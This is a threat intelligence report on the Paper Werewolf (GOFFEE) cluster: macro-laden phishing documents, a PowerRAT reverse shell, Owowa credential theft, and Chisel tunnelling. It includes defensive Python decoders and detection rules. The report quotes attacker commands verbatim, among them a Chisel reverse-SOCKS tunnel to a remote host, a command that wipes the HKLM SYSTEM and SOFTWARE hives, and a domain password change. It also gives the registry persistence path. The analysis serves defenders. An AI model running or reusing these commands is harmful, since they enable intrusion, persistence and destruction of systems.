The BI.ZONE Threat Intelligence team has recorded a surge in the activity of the Paper Werewolf cluster (also known as GOFFEE), which has conducted at least seven campaigns since 2022. Among the victims are government, energy, financial, media, and other organizations.
The adversaries send out phishing emails with a Microsoft Word attachment containing a malicious macro. However, their latest activity goes beyond espionage purposes: we have detected a case where Paper Werewolf disrupted the operation of the compromised infrastructure.
Attackers tend to distribute phishing emails on behalf of well-known organizations: large institutions, regulators, law enforcement. Using the names of reputable companies makes the victim trust the sender and open the email. It should be noted that organizations are not liable for the actions of criminals and related damage.
Key findings
- While primarily committed to cyber espionage, such clusters can ruin the operation of target infrastructures simply out of spite, once their primary goal is achieved.
- Apart from experimenting with post-exploitation frameworks, the adversaries develop their own implants for such frameworks, which significantly impedes detection.
- The attackers opt for the PowerShell interpreter as a versatile tool that enables them to bypass corporate defenses.
Campaign
Paper Werewolf uses Microsoft Word documents that contain a malicious macro. Such files are likely distributed via phishing emails.
It is noteworthy that the adversaries often apply the Gophish open-source framework to organize their mailings. The framework is designed for testing enterprise vulnerability to phishing.
The distributed files are masked as documents from various organizations (a research institution, a municipal administration, a power grid company, etc.).
As the malicious file is encrypted, the victim is prompted to allow macros.
Once the victim allows macros, the document content is decrypted.
The document is decrypted by replacing special characters with respective Russian letters.
Searching for the payload within the document starts after the DigitalRSASignature keystring. The payload is Base64-encoded and consists of two parts divided by a CHECKSUM string.
The macro decrypts the payload and writes it into two files:
- %USERPROFILE%\UserCache.ini (PowerShell script)
- %USERPROFILE%\UserCache.ini.hta (HTA)
To gain persistence in the compromised system, the path to UserCache.ini.hta is written into the following registry parameter:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LOAD
To conceal the malicious programs in the compromised system, the threat actor uses environment variables:
AZURE_RESOURCE_GROUP=JAB0AHkAegBmAHQAbgBnAGkAYgBpACAAPQAgACgARwBlAHQALQBEA[redacted]
ONEDRIVE_RESOURCE_GROUP=AuADAAIABTAGEAZgBhAHIAaQAvADUAMwA3AC4AMwAiACkAOwA[redacted]
VB=VBScript
AZURE_DECODE=[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($env:AZURE_RESOURCE_GROUP+$env:ONEDRIVE_RESOURCE_GROUP))
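The two decoding steps above (locating the Base64 payload after the keystring and reconstructing the script from the split environment variables) are straightforward to reproduce for triage. The following Python is an added analyst helper, not code from the report or from the threat actor: the document text, the two payload parts and the stand-in script are constructed here, and the assumption that the two Base64 runs contain no characters outside the Base64 alphabet (apart from whitespace in the first one) is mine.

```python
import base64
import re

# Marker strings from the report: the macro looks for the payload after the
# DigitalRSASignature keystring, and the two parts are separated by CHECKSUM.
PAYLOAD_MARKER = "DigitalRSASignature"
PART_SEPARATOR = "CHECKSUM"

# Constructed stand-ins for the two payload parts (not the real implant).
SAMPLE_PART_PS = b"Write-Output 'stand-in for UserCache.ini'"
SAMPLE_PART_HTA = b"<html><!-- stand-in for UserCache.ini.hta --></html>"

# Constructed document text with the report's layout: decoy text, marker,
# Base64 part one, CHECKSUM, Base64 part two, more text.
SAMPLE_DOCUMENT = (
    "Decoy text the victim sees\n"
    + PAYLOAD_MARKER
    + base64.b64encode(SAMPLE_PART_PS).decode()
    + PART_SEPARATOR
    + base64.b64encode(SAMPLE_PART_HTA).decode()
    + "\nTrailing text"
)


def extract_payload(document_text: str) -> dict:
    """Return the two decoded payload parts keyed by the file names the
    macro writes them to. Raises ValueError if the structure is absent."""
    idx = document_text.find(PAYLOAD_MARKER)
    if idx < 0:
        raise ValueError("payload marker not found")
    tail = document_text[idx + len(PAYLOAD_MARKER):]
    # Lazy match for part one stops at the first CHECKSUM; part two runs to
    # the first non-Base64 character (a line break or decoy text).
    match = re.match(
        r"([A-Za-z0-9+/=\s]+?)" + PART_SEPARATOR + r"([A-Za-z0-9+/=]+)", tail
    )
    if not match:
        raise ValueError("payload is not two Base64 parts split by CHECKSUM")
    part_one = re.sub(r"\s+", "", match.group(1))
    part_two = match.group(2)
    return {
        "UserCache.ini": base64.b64decode(part_one, validate=True),
        "UserCache.ini.hta": base64.b64decode(part_two, validate=True),
    }


def decode_unicode_base64(text: str) -> str:
    """Base64-decode and read the bytes as UTF-16LE, which is what
    [System.Text.Encoding]::Unicode means in .NET."""
    return base64.b64decode(text).decode("utf-16-le")


def decode_env_stage(env: dict) -> str:
    """Do what the AZURE_DECODE expression does: concatenate the two chunk
    variables and decode the result as UTF-16LE text."""
    return decode_unicode_base64(
        env["AZURE_RESOURCE_GROUP"] + env["ONEDRIVE_RESOURCE_GROUP"]
    )


# Constructed stand-in script, UTF-16LE encoded, Base64'd and split across
# the two variables the report names (the split point is arbitrary).
SAMPLE_SCRIPT = "$stage = (Get-Date); Write-Output $stage"
_encoded = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_ENV = {
    "AZURE_RESOURCE_GROUP": _encoded[:40],
    "ONEDRIVE_RESOURCE_GROUP": _encoded[40:],
}

if __name__ == "__main__":
    for name, data in extract_payload(SAMPLE_DOCUMENT).items():
        print(name, len(data), "bytes")
    print(decode_env_stage(SAMPLE_ENV))
```

The UTF-16LE reading is why the variable values above consist largely of `A`-padded pairs: the first eight characters of the AZURE_RESOURCE_GROUP value, JAB0AHkA, decode this way to `$ty`, consistent with a PowerShell variable assignment. Decoding the concatenation of a truncated sample will fail on padding, so use the full values from the compromised environment.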
In one of the cases, the malicious document contained a link to a 1×1 pixel image. Using this trick, the attackers can monitor whether the victim has opened the malicious document.
The HTA file creates and runs a file %USERPROFILE%\UserCacheHelper.lnk.js to execute the PowerShell script %USERPROFILE%\UserCache.ini.
The encrypted content of UserCache.ini is a reverse shell, a PowerShell script known as PowerRAT, which:
- sets the Hidden attribute on the UserCache.ini and UserCache.ini.hta files
- calls the server hxxp://[redacted]:80/api/texts/<victim_id> for commands, where victim_id stands for [computer name]_[username]_[serial number of the system disk]; these are XML commands with the following attributes: CountRuns (a command runs counter), Interval (a command interval in minutes), and Module (a Base64-encoded command, i.e. a PowerShell script)
- runs the command received from the server, launching it through Invoke-Expression
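The beacon path and the XML command layout give a defender two concrete things to look for: the victim_id shape in web-proxy logs, and the attributes to pull out of a captured server response. The Python below is an added example, not code from the report: the proxy log lines, the server address and the `<Command>` element name are constructed (the report names only the attributes), and the assumption that computer and user names contain no underscore is mine.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Beacon path from the report: /api/texts/<victim_id>, where victim_id is
# [computer name]_[username]_[serial number of the system disk]. That the
# host and user names contain no underscore is an assumption.
BEACON_PATH = re.compile(
    r"/api/texts/(?P<host>[^_/\s]+)_(?P<user>[^_/\s]+)_(?P<serial>[^_/\s]+)$"
)

# Constructed proxy log lines: timestamp, client IP, method, URL, status.
# 198.51.100.7 is a documentation-range placeholder, not an indicator.
SAMPLE_PROXY_LOG = """\
2024-05-02T10:00:01Z 10.0.0.15 GET http://198.51.100.7:80/api/texts/WS-ACC-07_jdoe_1A2B3C4D 200
2024-05-02T10:00:03Z 10.0.0.16 GET http://intranet.example/api/texts/readme.html 200
2024-05-02T10:00:09Z 10.0.0.15 GET http://198.51.100.7:80/api/texts/WS-ACC-07_jdoe_1A2B3C4D 200
"""


def find_beacons(log_text: str) -> list:
    """Flag requests whose path matches the PowerRAT beacon layout and
    break the victim_id into its three components."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        timestamp, client, _method, url, _status = fields[:5]
        path = re.sub(r"^https?://[^/]+", "", url)
        match = BEACON_PATH.search(path)
        if match:
            hits.append({"time": timestamp, "client": client, "url": url,
                         **match.groupdict()})
    return hits


def _decode_script(raw: bytes) -> str:
    # Heuristic: PowerShell tooling commonly Base64-encodes UTF-16LE text;
    # fall back to UTF-8 when the odd bytes are not mostly NUL.
    if raw and len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


# The <Command> element name is an assumption; the report lists attributes only.
SAMPLE_COMMAND_XML = (
    '<Command CountRuns="1" Interval="30" Module="'
    + base64.b64encode(b"Get-Process | Out-String").decode() + '"/>'
)
SAMPLE_COMMAND_XML_UTF16 = (
    '<Command CountRuns="3" Interval="5" Module="'
    + base64.b64encode("Get-Date".encode("utf-16-le")).decode() + '"/>'
)


def parse_command(xml_text: str) -> dict:
    """Parse one server command and decode its Module for analysis, without
    executing it (the implant would hand it to Invoke-Expression)."""
    root = ET.fromstring(xml_text)
    return {
        "count_runs": int(root.attrib["CountRuns"]),
        "interval_minutes": int(root.attrib["Interval"]),
        "module": _decode_script(base64.b64decode(root.attrib["Module"])),
    }


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_PROXY_LOG):
        print(hit["time"], hit["client"], hit["host"], hit["user"], hit["serial"])
    print(parse_command(SAMPLE_COMMAND_XML))
```

Two beacons from the same client to the same victim_id a few seconds apart is the pattern to alert on; the Interval attribute gives the expected cadence once a command has been captured, so repeated requests at that spacing corroborate the match.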
In other attacks, the adversaries use their own loader mimicking explorer.exe. The malicious program loads and opens a decoy document, which is written into the %TEMP% directory. Then the loader sends an HTTP POST request to the server to advance to the next stage. As of the date of this article, the next stage was not available for research, but we suppose that it involves a Mythic framework agent developed by the adversaries, known as PowerTaskel and QwakMyAgent. The function names in the loader are hashed with the Fowler–Noll–Vo algorithm.
Curiously enough, the attackers use this implant along with another framework agent, Freyja.
The threat actor’s arsenal also includes a malicious IIS module, Owowa, that enables them to retrieve credentials during user authentication to the Outlook Web Access (OWA) service. The retrieved data is kept in memory in a HashSet.
One of the Owowa modules would return a Base64-encoded encrypted dataset where the request header contains the username ZaDS0tojX0VDh82, and would delete the content of the decrypted dataset and return an Ok string (RSA-encrypted) where the request header contains the username oACgTsBMliysfk.
To create a redundant access channel to the compromised IT infrastructure, the attackers resort to Chisel:
mastc.exe client --tls-skip-verify -v https://[redacted]:49611 R:socks
They probably use PsExec to run commands on remote systems, in particular to perform destructive actions:
cmd.exe /c 'shutdown /r /f /t 5 && reg delete HKEY_LOCAL_MACHINE\SYSTEM /f && reg delete HKEY_LOCAL_MACHINE\SOFTWARE /f'
To hinder the staff’s interaction with the compromised IT infrastructure, the criminals change account passwords:
net user [redacted] [redacted] /domain
In the cases above, the attackers use a PowerShell script to run commands.
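The host-side behaviours described in this section (an Office application spawning mshta, the Load registry value being set, the Chisel client, a PsExec child process, the shutdown-plus-registry-wipe command line, and a domain password change via net user) can each be expressed as a simple rule over process-creation and registry telemetry. The Python below is an added example written for this page, not BI.ZONE's EDR rule logic: the Sysmon-style events, paths, account names and the 203.0.113.5 address are constructed; the first four rule names are taken from the detection list on this page and the last two are mine.

```python
import re

# Constructed Sysmon-style telemetry (id 1 = process creation, id 13 =
# registry value set), modelled on the behaviours in the report. Paths,
# user names and the 203.0.113.5 address are placeholders, not indicators.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": r"mshta.exe C:\Users\jdoe\UserCache.ini.hta"},
    {"id": 13, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "target_object": r"HKU\S-1-5-21-1\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Load",
     "details": r"C:\Users\jdoe\UserCache.ini.hta"},
    {"id": 1, "image": r"C:\Users\jdoe\AppData\Local\Temp\mastc.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "mastc.exe client --tls-skip-verify -v https://203.0.113.5:49611 R:socks"},
    {"id": 1, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\PSEXESVC.exe",
     "command_line": r"cmd.exe /c shutdown /r /f /t 5 && reg delete HKEY_LOCAL_MACHINE\SYSTEM /f"},
    {"id": 1, "image": r"C:\Windows\System32\net.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "net user svc_backup Placeholder1 /domain"},
    {"id": 1, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "notepad.exe notes.txt"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}


def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _cmd(event: dict) -> str:
    return event.get("command_line", "").lower()


def office_spawns_script_host(e):
    return e["id"] == 1 and _name(e.get("parent_image", "")) in OFFICE_APPS \
        and _name(e["image"]) in SCRIPT_HOSTS


def load_regkey_persistence(e):
    # The Load value under Windows NT\CurrentVersion\Windows runs at logon.
    return e["id"] == 13 and e.get("target_object", "").lower().endswith(
        "\\windows nt\\currentversion\\windows\\load")


def chisel_client(e):
    # Reverse SOCKS tunnel with TLS verification disabled, as in the report.
    return e["id"] == 1 and " client " in _cmd(e) and "r:socks" in _cmd(e)


def psexec_child(e):
    return e["id"] == 1 and _name(e.get("parent_image", "")) == "psexesvc.exe"


def destructive_shutdown(e):
    return e["id"] == 1 and "shutdown" in _cmd(e) \
        and re.search(r"reg\s+delete\s+hk", _cmd(e)) is not None


def domain_password_change(e):
    # "net user <name> <password> /domain" has at least five tokens; the
    # four-token "net user <name> /domain" only queries the account.
    tokens = _cmd(e).split()
    return e["id"] == 1 and _name(e["image"]) in {"net.exe", "net1.exe"} \
        and tokens[:2] == ["net", "user"] and "/domain" in tokens and len(tokens) >= 5


# First four names come from the report's detection list; the last two are mine.
RULES = {
    "win_spawning_untipical_process_by_ms_office_app": office_spawns_script_host,
    "win_persistence_via_load_regkey_was_detected": load_regkey_persistence,
    "gen_chisel_usage_detected": chisel_client,
    "win_using_psexec_to_execute_process_on_remote_host": psexec_child,
    "destructive_shutdown_and_registry_wipe": destructive_shutdown,
    "domain_account_password_change": domain_password_change,
}


def evaluate(events: list) -> list:
    """Return (rule name, event index) pairs for every rule each event trips."""
    return [(name, i) for i, e in enumerate(events)
            for name, rule in RULES.items() if rule(e)]


if __name__ == "__main__":
    for name, index in evaluate(SAMPLE_EVENTS):
        print(f"{name}: event {index}")
```

The shutdown-and-registry-wipe rule deserves the highest severity of the set: once `reg delete` against HKLM\SYSTEM completes, the host will not boot again, so the response has to be isolation of the PsExec source rather than remediation on the target.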
Indicators of compromise
fa8853aaa156485855b77a16a2f613d9f58d82ef63505be8b19563827089bf52
13252199b18d5257a60f57de95d8c6be7d7973df7f957bca8c2f31e15fcc947b
8ba4cd7ea29f990cb86291003f82239bfafe28910d080b5b7d3db78e83c1b6f3
37b3fa8a3a05e4aedb25eb38d9e4524722f28c21fac9f788f87113c5b9184ef5
804cd68f40d0bb93b6676447af719388e95cafd5a2b017a0386eb7de590ebf17
disk-yanbex[.]ru
lobbyluxuries[.]com
94.103.85[.]47
185.244.182[.]87
5.252.176[.]55
85.198.110[.]216
You can find more indicators of compromise related to the Paper Werewolf activity on the BI.ZONE Threat Intelligence portal.
MITRE ATT&CK
Detection
The BI.ZONE EDR rules below can help organizations detect the described malicious activity:
win_enable_macros_in_ms_office_document
win_spawning_untipical_process_by_ms_office_app
win_hta_file_was_created_by_ms_office_app
win_unusual_mshta_parent_process
win_persistence_via_load_regkey_was_detected
win_set_hidden_file_attribute_for_executable_or_script
win_suspicious_powershell_execution_code_from_file
gen_chisel_usage_detected
win_using_psexec_to_execute_process_on_remote_host
How to protect your company from such threats
To stay ahead of threat actors, you need to understand their methods and tools and take this information into account when assessing the threat landscape of your organization. For this purpose, we would recommend that you leverage the data from the BI.ZONE Threat Intelligence portal. It provides information about the current attacks, threat actors, their tactics, techniques, and tools. This data helps to ensure the precision of your security solutions, which in turn accelerates incident response and protects your company from the most critical threats.